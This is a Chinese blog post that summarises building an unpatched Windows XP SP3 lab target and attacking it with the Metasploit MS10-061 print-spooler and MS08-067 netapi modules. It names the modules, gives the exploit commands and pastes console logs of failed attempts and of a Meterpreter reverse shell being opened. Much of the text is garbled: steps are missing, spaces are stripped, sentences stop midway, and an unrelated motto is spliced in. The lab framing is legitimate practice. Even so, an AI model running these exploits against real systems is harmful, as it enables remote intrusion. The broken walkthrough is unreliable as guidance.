MS08067/MS10061漏洞靶机环境搭建总结

MS10-061靶机搭建环境网上并没找到什么资料,做一个总结,为大家提供参考:

MS10-061:打印后台程序服务中可能允许远程执行代码漏洞

准备环境:

VMware

WINDOWSXPSP3原版镜像,不能打过补丁

下载地址:

1、安装完成后,在控制面板中的

2、VMware

3、删掉了默认的打印机(自愿),然后,添加打印机

4、重启

5、保存一个快照(便于恢复环境和下面的漏洞的测试)

6、攻击

7、useexploit/windows/smb/ms10_061_spoolss

10、exploit

此时就返回了一个

meterpreter>

MS08-067靶机环境同样没什么资料,也来个总结:

这个洞有两个端口可以利用,,

1、上面那个环境就可以继续用,打开

2、设置一个文件夹共享,如右键共享文档

3、保存快照2(这里用于方便后面的实验,由于这个洞比较有个性,所以建议保存下吧)

4、上metasploit

5、useexploit/windows/smb/ms08_067_netapi

8、exploit

9、这里要说明一下这个洞为什么有个性:

本人实验发现:有时候会攻击失败,有时候又攻击成功,有时候2次实验总结,最终得出如下结论:

1)(

msfexploit(ms08_067_netapi)>exploit

[*]Startedreversehandleron200.200.88.179:4444

[*]Automaticallydetectingthetarget…

[*]Fingerprint:WindowsXP-ServicePack3-lang:Chinese-Traditional

[*]SelectedTarget:WindowsXPSP3Chinese-Traditional(NX)

[*]Attemptingtotriggerthevulnerability…

msfexploit(ms08_067_netapi)>

此时查看靶机:共享文档的共享属性没了,服务computerbrowser关闭了,如果等一会,桌面还会出现少许的异常变化。此时恢复快照吧

2

msfexploit(ms08_067_netapi)>exploit

[*]Startedreversehandleron200.200.88.179:4444

[-]Exploitfailed[no-access]:Rex::Proto::SMB::Exceptions::LoginErrorLoginFailed:TheSMBserverdidnotreplytoourrequest

解决方案:

多试几次,总会回答

msfexploit(ms08_067_netapi)>exploit

[*]Startedreversehandleron200.200.88.179:4444

[-]Exploitfailed[no-access]:Rex::Proto::SMB::Exceptions::LoginErrorLoginFailed:TheSMBserverdidnotreplytoourrequest

msfexploit(ms08_067_netapi)>exploit

[*]Startedreversehandleron200.200.88.179:4444

[-]Exploitfailed[no-access]:Rex::Proto::SMB::Exceptions::LoginErrorLoginFailed:TheSMBserverdidnotreplytoourrequest

[*]Sendingstage(885806bytes)to200.200.88.182

[*]Meterpretersession1opened(200.200.88.179:4444->200.200.88.182:2380)at2015-08-1516:27:38+0800

meterpreter>

总结:一般的,

生命不是一场赛跑,而是一次旅行。比赛在乎终点,而旅行在乎沿途风景。

MS08067/MS10061漏洞靶机环境搭建总结

相关文章:

你感兴趣的文章:

标签云: